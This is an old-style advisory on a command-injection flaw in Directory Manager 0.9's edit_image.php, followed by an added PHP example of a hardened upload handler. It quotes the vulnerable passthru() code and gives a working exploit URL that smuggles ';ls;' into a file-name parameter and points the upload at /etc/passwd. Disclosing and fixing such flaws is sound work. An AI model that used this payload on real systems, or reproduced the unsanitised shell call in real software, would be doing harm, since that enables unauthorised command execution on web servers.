Directory Manager Execute Command

!BUG!

Version Affected : Directory Manager 0.9

Directory Manager is a directory manager ;) I really don't know what it does.
It has a serious security flaw which allows any person to execute commands on the attacked system as the webserver user.

From edit_image.php :

    if( !$dn )
        Header( "Location: $defaultpage" );
    ...
    if( is_file( $userfile ) && $userfile_name ) {
        if( copy( $userfile, "/tmp/" . $userfile_name ) ) {
            ...
            passthru( "/usr/bin/convert -scale 600x600 /tmp/$userfile_name /tmp/$userfile_name.jpg" );
            ...
            unlink( "/tmp/$userfile_name.jpg" );

So we can put "evil code" into the $userfile_name variable, for example $userfile_name=;ls; . After that, the second path passed to /usr/bin/convert will look like this :

    /tmp/;ls;.jpg

This is a correct path in unix, so the copy function won't fail, and the passthru function will execute ls ;)

Example Exploit :

    victim.host/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20

Karol Wiesek - appelast

gr33tz :
cliph - his brain is real fast, not all the time.
#BSquad - patataj
pruty - #BSquad cycler with broken hand ;) yeah he really wants to ride a bike but he can't ;>
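
A hardened form of the upload step quoted from edit_image.php, as an added example that is not from the advisory or from Directory Manager. The function names, the `userfile` form field read through `$_FILES`, and the `dm_` temp-file prefix are assumptions. It builds the command string the quoted code would build (without running it) next to one where the client-supplied name never reaches the filesystem or the shell.

```php
<?php
// Added example, not Directory Manager code; function names are hypothetical.

// Command string exactly as the quoted edit_image.php builds it (never executed here).
function vulnerable_command(string $userfile_name): string
{
    return "/usr/bin/convert -scale 600x600 /tmp/$userfile_name /tmp/$userfile_name.jpg";
}

// Server-chosen source and destination paths; the client's file name is ignored.
function hardened_paths(): array
{
    $src = tempnam(sys_get_temp_dir(), 'dm_');
    if ($src === false) {
        throw new RuntimeException('cannot create temporary file');
    }
    return [$src, $src . '.jpg'];
}

// escapeshellarg() single-quotes each argument, so ';' stays literal data.
function hardened_command(string $src, string $dst): string
{
    return '/usr/bin/convert -scale 600x600 '
        . escapeshellarg($src) . ' ' . escapeshellarg($dst);
}

// Upload handler; $file is one entry of $_FILES (assumed field name "userfile").
function handle_upload(array $file): void
{
    // Accept only a file PHP itself received via HTTP POST, so a request
    // parameter such as userfile=/etc/passwd cannot name an arbitrary path.
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    [$src, $dst] = hardened_paths();
    if (!move_uploaded_file($file['tmp_name'], $src)) {
        throw new RuntimeException('cannot store upload');
    }
    exec(hardened_command($src, $dst), $out, $status);
    // ... use $dst here, then clean up both files.
    @unlink($src);
    @unlink($dst);
    if ($status !== 0) {
        throw new RuntimeException('convert failed');
    }
}

// Constructed input matching the advisory's example value.
echo vulnerable_command(' ;ls; '), "\n";
[$src, $dst] = hardened_paths();
echo hardened_command($src, $dst), "\n";
unlink($src);
```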